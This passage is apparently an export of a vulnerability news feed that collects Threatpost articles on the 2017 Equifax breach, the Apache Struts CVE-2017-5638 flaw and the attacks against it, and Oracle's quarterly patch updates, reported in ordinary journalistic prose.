This settlement requires that the company take steps to improve its data security going forward, and will ensure that consumers harmed by this breach can receive help protecting themselves from identity theft and fraud.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nEquifax, which handles data associated with more than 820 million customers and 91 million businesses worldwide, has been under public scrutiny since September 2017 when [it disclosed](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) a data breach that impacted almost 150 million Americans. The attackers managed to [access information](<https://threatpost.com/equifax-data-nation-state/141929/>) containing Social Security numbers, birth dates, addresses, and some driver\u2019s license numbers. Equifax said it discovered the intrusion on July 29, meaning attackers apparently had access to the company\u2019s files for nearly 12 weeks.\n\nAfter the data breach, Equifax was hit by multiple lawsuits, as well as investigations by the FTC, the CFPB, the Attorneys General of 48 states, and more.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/07/22101929/eqfx-socmed-summary.png>)\n\nLawsuits claimed that Equifax failed to patch its network in March 2017 after being alerted of a [critical security flaw](<https://threatpost.com/equifax-adds-2-4-million-more-people-to-list-of-those-impacted-by-2017-breach/130209/>) (an Apache Struts vulnerability, CVE-2017-5638) in its Equifax Automated Consumer Interview System database (which handles inquiries from consumers about their personal credit data). 
This vulnerability was ultimately exploited by bad actors, leading to the data breach.\n\nAs part of the agreement, Equifax also said it will take steps to enhance its information security and technology program, as well as make payments totaling $290.5 million to state and federal regulatory agencies to pay attorneys\u2019 fees and costs in the multi-district litigation.\n\nIn the past month, a slew of fines and penalties have been imposed that were tied to privacy and data breach incidents. Earlier in July, the [FTC slapped](<https://threatpost.com/privacy-experts-facebooks-5b-fine/146478/>) a $5 billion fine on Facebook for privacy violations following its Cambridge Analytica incident. Also hit with security-related fines in July were [Marriott](<https://threatpost.com/marriott-123m-fine-data-breach/146320/>) ($123 million) and [British Airways](<https://threatpost.com/post-data-breach-british-airways-slapped-with-record-230m-fine/146272/>) ($230 million).\n\nWhile opinions are mixed about the appropriate penalty for these companies and Equifax, security experts for their part hope that other companies will take note of the fines when it comes to data security and privacy.\n\n\u201cI\u2019m far from an Equifax apologist, but the truth is it could have been anyone,\u201d Adam Laub, chief marketing officer at STEALTHbits Technologies said in an email. \u201cIt\u2019s not an excuse, but rather the reality we live in. The best outcome isn\u2019t Equifax making the situation right \u2013 although that is important for all of those affected \u2013 it\u2019s everyone else learning that the price to be paid outweighs the inconvenience of ensuring proper measures are taken to secure the data that puts them at risk in the first place. And it\u2019s got to be from the ground up too. There\u2019s no silver bullet.\u201d\n\n**_Interested in more on patch management? 
Don\u2019t miss our free live _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/1579496132196807171?source=ART>)**_, \u201c_****_Streamlining Patch Management,\u201d on Wed., July 24, at 2:00 p.m. EDT. Please join Threatpost editor Tom Spring and a panel of patch experts as they discuss the latest trends in Patch Management, how to find the right solution for your business and what the biggest challenges are when it comes to deploying a program. _****_[Register and Learn More](<https://attendee.gotowebinar.com/register/1579496132196807171?source=ART>)_**\n", "cvss3": {}, "published": "2019-07-22T14:31:39", "type": "threatpost", "title": "Equifax to Pay $700 Million in 2017 Data Breach Settlement", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-07-22T14:31:39", "id": "THREATPOST:5ADABEB29891532ECFF2D6ABD99CAED4", "href": "https://threatpost.com/equifax-to-pay-700-million-in-2017-data-breach-settlement/146579/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:53:59", "description": "Public attacks and scans looking for exposed Apache webservers have ramped up dramatically since Monday when a vulnerability in the Struts 2 web application framework was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) and proof-of-concept exploit code was introduced into Metasploit.\n\nThe vulnerability, [CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>), was already under attack in the wild prior to Monday\u2019s disclosure, but since then, the situation has worsened and experts fear it\u2019s going to linger for a while.\n\n\u201cThe second someone starts working on a [Metasploit module](<https://github.com/rapid7/metasploit-framework/issues/8064>), it\u2019s a ramp-up for rapid exploitation by a large number of people,\u201d said Craig Williams, senior technical leader for Cisco\u2019s Talos research outfit. 
\u201cWe\u2019re basically seeing a huge number of people continue to exploit the vulnerability. That\u2019s likely going to continue to increase. I think what we\u2019re also going to see is people going to try to scan for the vulnerability.\u201d\n\nThe flaw lives in the Jakarta Multipart parser upload function in Apache. It allows an attacker to easily make a maliciously crafted request (a malicious Content-Type value) to an Apache webserver and have it execute. Struts 2.3.5 to Struts 2.3.31 are affected as are Struts 2.5 to 2.5.10; admins are urged to upgrade immediately to [Struts 2.3.32](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32>) or [2.5.10.1](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1>).\n\nTalk of the vulnerability surfaced on Chinese forums, according to Vincente Motos, who posted an advisory on the [HackPlayers](<http://www.hackplayers.com/2017/03/exploit-rce-para-apache-struts-cve-2017-5638.html>) website. Motos said a notorious Apache Struts hacker known as Nike Zheng posted a public proof-of-concept exploit demonstrating the simplicity in which an attacker could inject operating system commands.\n\nThe attacks are particularly risky to anyone running their Apache webservers as root, which is not a suggested practice. Williams said it\u2019s unclear whether an attacker can benignly scan for vulnerable servers in order to determine the version and context under which Struts is running, whether as Apache or root, for example. But as with some older internet-wide bugs, there are a large number of scans happening.\n\n\u201c[Attacks] look like requests to a webserver with a malformed piece,\u201d Williams said. 
\u201cUnless you\u2019re looking for it, it\u2019s easy not to see the malformed content type.\u201d\n\nAn attacker, he said, would need to just modify one line depending on the operating system the target is running, Windows or Linux, and have it download a malicious binary from the web.\n\n\u201cUnfortunately, due to the nature of command-line injections like this, it\u2019s very easy to modify,\u201d Williams said. \u201cAnd that\u2019s why I think we\u2019re going to continue to see exploitation rise for the foreseeable future.\u201d\n\nThe risks are severe for an organization running an exposed Apache server if it\u2019s compromised.\n\n\u201cThe sky\u2019s the limit,\u201d Williams said. \u201cIf I\u2019m a bad guy, depending on what my game is, I can take over your webserver and use that to move laterally through your network. If I\u2019m super insidious, I can use that to look for your domain controller and if I can find a way to compromise your password hashes, say from the Linux server I compromised, I can possibly log in to your domain controller and use that to push malware to all your machines. I could ransom off your webserver, all kinds of terrible things.\u201d\n\nWilliams said [Cisco has observed](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) that the majority of public attacks feature a number of Linux bots used for DDoS attacks taking advantage of this vulnerability, along with an IRC bouncer, and a malware sample related to the bill gates botnet.\n\nWilliams cautioned as well that connected devices in the IoT space could also be a major concern, since Struts 2 likely runs there.\n\n\u201cI\u2019m going to guess there\u2019s a reasonable number of devices running it, and due to the nature of IoT, those aren\u2019t going to be patched any time soon. 
So this is going to be an issue for the foreseeable future.\u201d\n\nGiven the availability of patches and detection rules, it\u2019s likely that public attacks are going to be largely mitigated and as more detection rules surface, public exploits should be less useful to attackers.\n\n\u201cDue to the fact that it\u2019s relatively easy to go inside and modify an attack, it\u2019s going to be bad and it\u2019s going to plague us for some time,\u201d Williams said. \u201cGood news is that detecting it is not that difficult.\u201d\n", "cvss3": {}, "published": "2017-03-09T12:25:46", "type": "threatpost", "title": "Attacks Heating Up Against Apache Struts 2 Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-09T19:50:52", "id": "THREATPOST:1C2F8B65F8584E9BF67617A331A7B993", "href": "https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:27:47", "description": "Equifax said that an additional 2.4 million Americans have had their [personal data](<https://investor.equifax.com/news-and-events/news/2018/03-01-2018-140531340>) stolen as part of the company\u2019s massive 2017 data breach, including their names and some of their driver\u2019s license information.\n\nThe additional identified victims bring the total of those implicated in what has become the largest data breach of personal information in history to around 148 million people.\n\nThe consumer credit reporting agency on Thursday said that as part of an \u201congoing analysis\u201d it found that these newly identified victims\u2019 names and partial driver\u2019s license numbers were stolen by attackers. 
However, unlike the previous 145.5 million people who have been identified to date as impacted by the 2017 breach, the Social Security numbers of these additional victims were not impacted.\n\nAttackers were also unable to reach additional license details for this latest slew of impacted victims \u2013 including the state where their licenses were issued and the expiration dates.\n\n\u201cThis is not about newly discovered stolen data,\u201d Paulino do Rego Barros, Jr., interim chief executive officer of Equifax, said in a statement. \u201cIt\u2019s about sifting through the previously identified stolen data, analyzing other information in our databases that was not taken by the attackers, and making connections that enabled us to identify additional individuals.\u201d\n\nEquifax said the new victims were not previously identified because their Social Security numbers were not stolen together with their driver\u2019s license information.\n\n\u201cThe methodology used in the company\u2019s forensic examination of last year\u2019s cybersecurity incident leveraged Social Security Numbers (SSNs) and names as the key data elements to identify who was affected by the cyberattack,\u201d said the company in a statement. \u201cThis was in part because forensics experts had determined that the attackers were predominately focused on stealing SSNs.\u201d\n\nEquifax said it will notify the newly identified consumers directly by U.S. Postal mail, \u201cand will offer identity theft protection and credit file monitoring services at no cost to them,\u201d said the company.\n\nThe company did not respond to requests for further comment from Threatpost about its current ongoing analysis of the breach.\n\n**Ongoing Breach Disclosures**\n\nEquifax has been under public scrutiny since September, that\u2019s when it first disclosed the data breach after issuing a statement at the time that cybercriminals had exploited an unnamed \u201cU.S. 
website application vulnerability to gain access to certain files\u201d from May through July 2017. Equifax said it discovered the breach on July 29. The breach enabled criminals to access sensitive data like social security numbers, birth dates, and license numbers.\n\nLater, during Equifax\u2019s testimony in October before the U.S. House Committee on Energy and Commerce Subcommittee on Digital Commerce and Consumer Protection, it was revealed that Equifax was notified in March that the breach was tied to an unpatched [Apache Struts vulnerability, CVE-2017-5638](<https://threatpost.com/oracle-patches-apache-struts-reminds-users-to-update-equifax-bug/128151/>). It was established that while Equifax said it had requested the \u201capplicable personnel responsible\u201d to update the vulnerability it never was fixed.\n\n\u201cIt appears that the breach occurred because of both human error and technology failures,\u201d Richard Smith, Equifax CEO at the time, wrote in a [testimony](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>) that was released at the hearing in October.\n\nMaking the breach worse was Equifax\u2019s further botched response to the breach.\n\nAfter the breach was revealed in September, the company\u2019s site was crushed with traffic from concerned customers that left the site unreachable. In a separate instance in October, the Equifax site came under fire for harboring [adware](<https://threatpost.com/equifax-takes-down-compromised-page-redirecting-to-adware-download/128406/>) in a third-party partner\u2019s Flash Player download.\n\nThe extent and scope of the breach also has been continually expanding since it was first disclosed in September. 
In October, after an analysis with security company Mandiant, the company said that an [additional](<https://threatpost.com/equifax-says-145-5m-affected-by-breach-ex-ceo-testifies/128247/>) 2.5 million customers were also impacted on top of the 143 million the company initially said were affected.\n\nMeanwhile, in February, documents submitted by Equifax to the US Senate Banking Committee revealed that attackers also accessed taxpayers identification numbers, email addresses, and credit card expiration dates for certain customers.\n\n**Renewed Anger**\n\nThis latest slew of impacted customers has renewed anger against the company, with some demanding stricter legislation for data protection \u2013 such as the proposed Data Breach Prevention and Compensation Act, which would impose strict security-related fines on credit reporting agencies.\n\n> My office is continuing our investigation of [#Equifax](<https://twitter.com/hashtag/Equifax?src=hash&ref_src=twsrc%5Etfw>) so we can get to the bottom of how this disastrous data breach happened. \n> \n> We also need to change the law.\n> \n> \u2014 Eric Schneiderman (@AGSchneiderman) [March 1, 2018](<https://twitter.com/AGSchneiderman/status/969229077814108160?ref_src=twsrc%5Etfw>)\n\n> This is unacceptable. The California Department of Justice will continue to get to the bottom of this massive cybersecurity incident. We are committed to holding [#Equifax](<https://twitter.com/hashtag/Equifax?src=hash&ref_src=twsrc%5Etfw>) accountable to the fullest extent of the law. 
<https://t.co/fRPrUWcIyg>\n> \n> \u2014 Xavier Becerra (@AGBecerra) [March 1, 2018](<https://twitter.com/AGBecerra/status/969330796774359040?ref_src=twsrc%5Etfw>)\n\nEquifax, meanwhile, continues to remain under investigation by several federal and state agencies, including a probe by the Consumer Financial Protection Bureau.\n\nCustomers can see if their personal information has been breached by clicking on an \u201cAm I Impacted\u201d tool on Equifax\u2019s [website](<https://www.equifaxsecurity2017.com/>). The company also advised consumers to visit its web portal where they can review their account statements and credit reports, identify any unauthorized activity, and protect their personal information from attack.\n\nThe company handles data on more than 820 million customers and 91 million businesses worldwide.\n", "cvss3": {}, "published": "2018-03-02T15:12:57", "type": "threatpost", "title": "Equifax Says 2.4 Million More People Impacted By Massive 2017 Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-03-02T15:12:57", "id": "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "href": "https://threatpost.com/equifax-adds-2-4-million-more-people-to-list-of-those-impacted-by-2017-breach/130209/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:58", "description": "Malicious traffic stemming from exploits against the [Apache Struts 2 vulnerability](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>) disclosed and [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) this week has tapered off since Wednesday.\n\nResearchers at Rapid7 published an [analysis](<https://community.rapid7.com/community/infosec/blog/2017/03/09/apache-jakarta-vulnerability-attacks-in-the-wild>) of data collected from its honeypots situated on five major cloud providers and a number of private networks that shows a 
couple of dozen sources have targeted this vulnerability, but only two, originating in China, have actually sent malicious commands.\n\nCisco Talos said on Thursday that attacks had [risen sharply](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) since word leaked of publicly available exploits and a [Metasploit module](<https://github.com/rapid7/metasploit-framework/issues/8064>). But it conceded that it was difficult to ascertain whether probes for vulnerable Apache servers could be carried out benignly.\n\nRapid7 said that in a 72-hour period starting Tuesday, a handful of events cropped up peaking at fewer than 50 between 11 a.m. and 6 p.m. Wednesday.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06230023/pastedImage_1.png>)\n\n\u201cWe are really seeing limited attempts to exploit the vulnerability,\u201d said Tom Sellers, threat analyst and security researcher at Rapid7. \u201cFor context, please keep in mind that our data is from honeypots hosted in cloud providers and may not reflect what other sensors and organizations are seeing.\u201d\n\nCraig Williams, Cisco Talos senior technical lead, said researchers there are seeing attack traffic trending downward as well.\n\n\u201cEarly indicators and past experiences were pointing to this being an ongoing issue with attackers continuing to seek out vulnerable machines. Interestingly, over the last couple days, we have seen a slowing of activity,\u201d Williams said. \u201cBecause this is so unusual, we are continuing to monitor the situation in case the trend starts moving in the other direction. Again, this is not typical for this type of issue but great news all the same.\u201d\n\nThe vulnerability is in the Jakarta Multipart parser that comes with Apache. An attacker can trivially exploit the vulnerability to gain remote code execution by sending an HTTP request that contains a crafted Content-Type value. 
The vulnerable software will throw an exception in such cases.\n\n\u201cWhen the software is preparing the error message for display, a flaw in the Apache Struts Jakarta Multipart parser causes the malicious Content-Type value to be executed instead of displayed,\u201d Sellers wrote in an analysis published yesterday.\n\nThe vulnerability was disclosed and patched on Monday, and by Tuesday, Rapid7 was seeing two malicious requests from a host geo-located in Zhengzhou, China. The attacks arrived in HTTP GET requests and issued commands to the vulnerable webserver for it to download binaries from the attacker-controlled server on the internet. Sellers called it a standard command-injection attack against a webserver where the attacker is able to write code that instructs the server to reach out to an IP address and download code that executes on the server.\n\nThe second attack was spotted Wednesday when a host in Shanghai, China sent HTTP POST requests to servers instructing them to disable their firewall and grab code related to the XOR DDoS malware family.\n\n\u201cWhile we\u2019ve seen a couple dozen sources exploiting the vulnerability, only those two issued malicious commands,\u201d Sellers said. \u201cWe\u2019ve actually seen a drop off in related traffic since Wednesday. The most active attacker stopped on Thursday around 4 a.m. U.S. Central time.\u201d\n\nSellers said it\u2019s unclear as to why there\u2019s been a dropoff in malicious traffic.\n\n\u201cIt could be caused by a number of factors. The malicious payload is pretty obvious and easy to filter if traffic is inspected,\u201d Sellers said. \u201cAttackers might be prioritizing other vulnerabilities such as the ones announced in cameras recently. 
The lull may be temporary and we may see activity rise again after attention moves on to efforts.\u201d\n\nCisco raised the issue of IoT devices running the vulnerable Apache software as well, which could be an indicator of initial interest from DDoS bots.\n\n\u201cGiven the low sample size it\u2019s difficult for me to say. It\u2019s possible that DDoS bots are the early adopters since infection would generate easy, repeatable income and the code was trivial to port to existing frameworks,\u201d Sellers said. \u201cCompare that to ransomware, where a new deployment mechanism may need to be written but would likely only result in a single payout per host.\u201d\n\nResearchers were also seeing a number of requests probing for additional vulnerable servers that included whoami and ifconfig, commands that are relatively benign but could return information about what context the server is running in. Servers running at root\u2014an uncommon practice\u2014are most at risk.\n", "cvss3": {}, "published": "2017-03-10T10:51:01", "type": "threatpost", "title": "Apache Attack Traffic Dropping, Limited to Few Sources", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-10T16:12:17", "id": "THREATPOST:AACAA4F654495529E053D43901F00A81", "href": "https://threatpost.com/apache-attack-traffic-dropping-limited-to-few-sources/124227/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:31", "description": "Equifax, the credit agency behind this summer\u2019s breach of 143 million Americans, said this week the number of victims implicated in the breach has increased.\n\nPaulino do Rego Barros, Jr., the company\u2019s interim CEO, [announced Monday](<https://www.equifaxsecurity2017.com/>) that 2.5 million additional Americans were also impacted, bringing the grand total to 145.5 million affected individuals.\n\nEquifax initially called its investigation around the breach 
\u201csubstantially complete,\u201d but said it was still carrying out further analysis with Mandiant, a FireEye company it hired to investigate the breach, on the incident. According to Equifax, investigators didn\u2019t find any additional vulnerabilities. The extra 2.5 million Americans figure came \u201cduring Mandiant\u2019s completion of the remaining investigative tasks and quality assurance procedures built into the investigative process.\u201d\n\nThe company used the opportunity on Monday to reiterate that Canadian citizens were also impacted, although far fewer than initially thought. The company said several weeks ago that there may have been up to 100,000 Canadians affected; however, upon closer inspection, only 8,000 Canadian consumers were affected by the breach.\n\nEquifax says it\u2019s still analyzing exactly how many United Kingdom consumers have been affected by the breach and is in the middle of discussions with regulators to determine how to notify them.\n\nDetails about the breach came out the day before Richard Smith, Equifax\u2019s former CEO, was scheduled to testify about the breach before the U.S. House Committee on Energy and Commerce Subcommittee on Digital Commerce and Consumer Protection. Smith, former Equifax chairman and chief executive, [retired last Tuesday](<https://threatpost.com/oracle-patches-apache-struts-reminds-users-to-update-equifax-bug/128151/>) in the wake of the breach.\n\nIn a [written testimony (.PDF)](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>) released in tandem with the subcommittee hearing, Smith blamed the breach on a combination of \u201chuman error and technology failures.\u201d\n\n\u201cThese mistakes \u2013 made in the same chain of security systems designed with redundancies \u2013 allowed criminals to access over 140 million Americans\u2019 data,\u201d Smith wrote.\n\nIn the testimony Smith claimed that the U.S. 
Department of Homeland Security\u2019s Computer Emergency Readiness Team (U.S. CERT) notified Equifax on March 8 that [it needed to patch CVE-2017-5638](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>), the Apache Struts vulnerability that eventually led to the hack.\n\nEquifax requested the \u201capplicable personnel responsible\u201d update Apache Struts via email on March 9, something that should have been done within a 48 hour period, Smith said.\n\nThat was never done and according to Smith, the vulnerability wasn\u2019t picked up by internal scans designed to identify vulnerable systems carried out on March 15. The issue lingered for roughly two months until attackers accessed Equifax\u2019s systems on May 13 \u2013 and persisted until the company became aware of the attackers on July 30.\n\nGreg Walden (R-Ore.) pointed out some of Equifax\u2019s many missteps on Tuesday morning, including how Equifax\u2019s consumer facing website for the breach was put hosted on a separate domain from the main Equifax website, the confusion that spawned, and how on multiple occasions Equifax directed users to the wrong website.\n\n\u201cOn top of all the other issues, multiple times Equifax tweeted the wrong URL directing consumers to the wrong website to check if they were part of a breach,\u201d Walden said, \u201cTalk about ham-handed responses this is simply unacceptable and it makes me wonder if there was a breach response plan in place at all and if anyone was in charge of executing that plan.\u201d\n\nDuring another part of the hearing, Tim Murphy, a U.S. representative for Pennsylvania\u2019s 18th Congressional district, came back to that question. 
When told the company’s original site couldn’t handle the traffic it received, Murphy was befuddled.

“Why wouldn’t your website be able to handle this kind of traffic?” Murphy asked. “It just doesn’t make sense, a company your size and with your knowledge, doesn’t understand how to handle traffic for over 100 million people, don’t you use an Elastic cloud computing service that would’ve accounted for this?”

Smith said the sheer amount of traffic Equifax’s site received in the wake of the breach made hosting a site on its domain impossible.

“The environment the micro site is in is a cloud environment that’s very, very scalable,” Smith said. “Our traditional environment could not handle 400 million consumer visits for three weeks.”

Murphy also grilled Smith on what took Equifax so long to patch the March vulnerability and if it’s possible Equifax’s internal scanning system could potentially miss another vulnerability.

“If the patch only took a few days to apply why did Equifax fail to apply it in March when it was announced as critical?” Murphy asked.

Smith skirted the question and instead discussed the difficulties associated with patching.

“Patching can take a variety of time… it can take days or up to a week or more,” Smith said, adding that he wasn’t aware of the particular Struts vulnerability at the time.

At the end of the hearing, when pressed by Anna Eshoo, U.S. Representative for California’s 18th congressional district, Smith described the process around patching again but did little to deviate from his prepared testimony.

“I want to know when they did it, when they took care of [the patch],” Eshoo said.

“They took care of it in July because we never found it,” Smith said. “We had the human error, we did the scan, the technology never found it, in July we found suspicious activity, took the portal down, found the vulnerability, applied the patch.”

_Source: Threatpost, "Equifax Says 145.5M Affected by Breach, Ex-CEO Testifies", published 2017-10-03. [https://threatpost.com/equifax-says-145-5m-affected-by-breach-ex-ceo-testifies/128247/](<https://threatpost.com/equifax-says-145-5m-affected-by-breach-ex-ceo-testifies/128247/>). Tagged CVEs: CVE-2017-5638. CVSS v2 base score 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)._

### Oracle Patches 250 Bugs in Quarterly Critical Patch Update

Oracle patched 250 vulnerabilities across hundreds of different products as part of its [quarterly Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>) released today.

Rounding out the list of products with the most patches is Oracle Fusion Middleware with 38, Oracle Hospitality Applications with 37 and Oracle MySQL with 25.

Of the critical patches, security researchers at Onapsis said that they identified three high-risk SQL injection vulnerabilities in Oracle’s popular Oracle E-Business Suite (EBS).

“While all three are high-risk vulnerabilities, one (CVE-2017-10332) is very easy to exploit,” said JP Perez-Etchegoyen, CTO of Onapsis.

Onapsis is warning users of Oracle EBS (versions 12.1 and 12.2) that they are exposed to SQL injection vulnerabilities that could allow an attacker, over a network without any username and password credentials, to potentially gain access to and modify critical documents and information such as credit card data, customer information, HR documents or financial records.

Perez-Etchegoyen said each of the SQL injection vulnerabilities can easily be exploited by attackers who can disrupt, exfiltrate or manipulate data that is part of a
business’ enterprise resource planning, supply chain management or finance management systems.

“These vulnerabilities are especially risky as an attacker would only need a web browser and network access to the EBS system HTTP interface to perform it,” Perez-Etchegoyen said.

Onapsis said vulnerabilities found in Oracle’s EBS are on the rise, with a 29 percent increase in 2017 compared to the previous year.

The [patches come](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>) just weeks after Oracle OpenWorld, where Larry Ellison, co-founder, executive chairman and chief technology officer of Oracle, stressed the importance of security during his keynote. Ellison also used the occasion to stress the importance of software patching in light of the [recent Equifax breach](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>).

Last month, Oracle used an advisory as an opportunity to remind users that [in April it](<https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/>) fixed the Struts vulnerability (CVE-2017-5638) which was behind [Equifax’s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>).

Organizations are falling down when it comes to patching their most important business-critical applications, Perez-Etchegoyen said.

Citing a recent Ponemon Research study, Perez-Etchegoyen said fewer than half of the 600 respondents interviewed said they have a monthly plan to implement security patches for their Oracle EBS applications. Seventy percent believe it is likely their company would have a data breach due to insecure Oracle EBS applications that they have failed to secure or apply patches to.

Also part of Oracle’s quarterly update are patches for its Java Platform, Standard Edition, which received 22 new security fixes. Twenty of these vulnerabilities may be remotely exploitable without authentication, that is, they may be exploited over a network without requiring user credentials, Oracle said. The highest CVSS base score of vulnerabilities affecting Oracle Java SE is 9.6.

Impacted are Java Advanced Management Console, Java SE, Java SE Embedded and JRockit.

Oracle Database Server received six security fixes, with two of the vulnerabilities remotely exploitable without authentication. Affected Oracle Database Server components include Spatial (Apache Groovy), WLM (Apache Tomcat), Java VM, RDBMS Security, Core RDBMS and XML Database.

_Source: Threatpost, "Oracle Patches 250 Bugs in Quarterly Critical Patch Update", published 2017-10-17. [https://threatpost.com/oracle-patches-250-bugs-in-quarterly-critical-patch-update/128484/](<https://threatpost.com/oracle-patches-250-bugs-in-quarterly-critical-patch-update/128484/>). Tagged CVEs: CVE-2017-10332, CVE-2017-5638. CVSS v2 base score 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)._

### Record Oracle Patch Update Addresses ShadowBrokers, Struts 2 Vulnerabilities

Oracle released its biggest [Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html>) ever on Tuesday, and with it came added urgency in the form of patches for the Solaris vulnerabilities exposed by the [ShadowBrokers](<https://threatpost.com/shadowbrokers-expose-nsa-access-to-swift-service-bureaus/124996/>) last week, as well as the recent [Apache Struts 2 vulnerability](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), also under public attack.

In all, Oracle admins have a tall order with 299 patches across most of the company’s product lines; 162 of the vulnerabilities are remotely exploitable.

Two Solaris exploits were leaked by the mysterious ShadowBrokers last Friday.
The Solaris attacks were included among a rash of other exploits including a laundry list of Windows attacks, many of which had [already been patched by Microsoft](<https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/>) prior to last Friday’s dump.

One of the Solaris vulnerabilities, code-named EBBISLAND, had been patched in a number of updates dating back to 2012. The other, EXTREMEPARR, was addressed on Tuesday. It affects Solaris 7-10 on x86 and SPARC architectures, and is a local privilege escalation issue in the [dtappgather](<https://github.com/HackerFantastic/Public/blob/master/exploits/dtappgather-poc.sh>) component. Oracle patched versions 10 and 11.3 on Tuesday.

Researcher Matthew Hickey of U.K. consultancy Hacker House said the EXTREMEPARR attacks go back to Solaris 7, while EBBISLAND affects Solaris 6-10 and is a remote RPC services exploit. Both exploits allow attackers to elevate privileges to root and run shells on a compromised server.

> I said in December that EBBISLAND was likely an exploit for Solaris 6 through 10, I am today confirmed correct (upto 9, still untested) <https://t.co/A3fC7BuwcK>
>
> — Hacker Fantastic (@hackerfantastic) [April 8, 2017](<https://twitter.com/hackerfantastic/status/850802122224488452>)

“As a security researcher it was an extremely interesting find to discover such well written exploits in a public data dump,” Hickey wrote in a [report](<https://www.myhackerhouse.com/easter-egg-hunt_greetz/#sthash.YMmAy8Ez.dpuf>) published today, “even though the bug was a trivial path traversal for ‘dtappgather’ extensive steps had been taken to protect the attack specifics in the binary and a well tested tool which worked flawlessly on all tested hosts was included.”

Since last August, the ShadowBrokers have periodically released tools belonging to the Equation Group, widely believed to be the U.S. National Security Agency. The Solaris attacks are of particular concern since these are the backbone of many enterprise-grade server environments.

> The NSA had the power to hack any Oracle Solaris box in the world via UDP/TCP generically with anti-forensics capabilities and it’s public.
>
> — Hacker Fantastic (@hackerfantastic) [April 10, 2017](<https://twitter.com/hackerfantastic/status/851561358516736000>)

“This vulnerability can be exploited remotely without authentication or any information about the targeted machine,” said Amol Sarwate, director of [Qualys Vulnerability Labs](<https://blog.qualys.com/laws-of-vulnerabilities/2017/04/18/oracle-plugs-struts-hole-along-with-299-total-vulnerabilities>). “These are very critical vulnerabilities.”

The [Apache Struts 2 vulnerability](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>) has been public since early March, though it’s been publicly exploited for much longer. The flaw is in the Jakarta Multipart parser in Struts 2 2.3 before 2.3.32 and in 2.5 before 2.5.10.1. A remote attacker can send a request with a crafted Content-Type header: the parser copies the header value into an error message that is then evaluated as an OGNL expression, so an expression embedded in the header runs arbitrary commands on the server. Public scans and attacks ramped up immediately upon disclosure of the issue and development of a Metasploit module. For the most part, Linux-based DDoS bots were behind most of the exploit attempts, but a spate of attacks were detected attempting to install [Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable Windows servers.

Oracle patched Struts 2 in 25 of its products, including 19 different instances of its Oracle Financial Services Applications. Most of these Oracle applications, however, are not internet-facing and live behind an enterprise firewall.

“That could be a little bit of a saving grace for some of these services,” Qualys’ Sarwate said.
There could be some instances, however, where these apps are exposed to the public network for remote administration purposes, for example. There are also some cases in which admins may be learning for the first time that Struts 2 is running inside an Oracle product. “For a normal admin, it could be a little difficult unless a vendor tells them these are the products you’re running that are affected by the Struts 2 vulnerability. It could take some admins by surprise.”

While there were 47 patches in total for the financial applications suite, the MySQL database also received a hefty load of 39 fixes, 11 of which are remotely exploitable without authentication. The Oracle Retail Applications suite also had 39 vulnerabilities addressed, 32 of which were remotely exploitable. Oracle Fusion Middleware received 31 patches, 20 of which were for remotely exploitable vulnerabilities.

The previous record for quarterly Oracle patches was last July when [276 patches](<https://threatpost.com/oracle-patches-record-276-vulnerabilities-with-july-critical-patch-update/119373/>) were released; January’s update, the first for 2017, had [270 patches](<https://threatpost.com/oracle-patches-270-vulnerabilities-in-years-first-critical-patch-update/123155/>).

